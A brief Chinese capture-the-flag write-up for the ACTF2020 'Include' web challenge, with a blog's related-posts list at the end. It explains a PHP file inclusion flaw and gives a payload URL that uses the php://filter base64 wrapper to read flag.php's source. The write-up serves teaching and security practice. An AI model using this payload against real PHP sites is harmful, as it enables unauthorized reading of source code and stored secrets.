web:[ACTF2020 新生赛]Include

前提知识

文件包含漏洞

php伪协议

题目

点开题目,页面只显示一个tips,点进去看看

点进去之后

没有别的提示,先看源代码,恩,什么都没有

再看一下点进tips显示的页面,发现url中

flag可能就藏在这个页面中,但是被隐藏了看不见

题目名为include,可以联想到文件包含漏洞

构造payload

复制代码
http://83e3f0ce-775a-4dc5-b714-d5d5bfc15cd8.node4.buuoj.cn:81/?file=php://filter/read=convert.base64-encode/resource=flag.php

显示为

base64解码得,即得到flag

总结

提示信息也要包括题目名

相关推荐
大方子18 分钟前
【PolarCTF2026年春季挑战赛】The_Gift
网络安全·polarctf
菩提小狗1 小时前
每日安全情报报告 · 2026-03-27
网络安全·漏洞·cve·安全情报·每日安全
大方子1 小时前
【PolarCTF2026年春季挑战赛】sql_search
网络安全·polarctf
吉吉611 小时前
雷池waf绕过之正本
网络·网络安全
Sombra_Olivia2 小时前
Vulhub 中的 apache-cxf CVE-2024-28752
安全·web安全·网络安全·渗透测试·vulhub
卓豪终端管理2 小时前
当补丁还在路上,如何打赢零日漏洞的时间战?
网络·安全·web安全
小陈工2 小时前
2026年3月27日技术资讯洞察:量子计算密码突破、硬件安全新范式与三月网络安全警报
服务器·python·安全·web安全·单元测试·集成测试·量子计算
谪星·阿凯2 小时前
文件包含与下载读取漏洞:实战进阶与场景突破
android·网络安全
CDN3602 小时前
中小站安全加速:360CDN + 高防服务器搭配使用
运维·网络安全
还是做不到嘛\.12 小时前
Dvwa靶场-SQL Injection
数据库·sql·web安全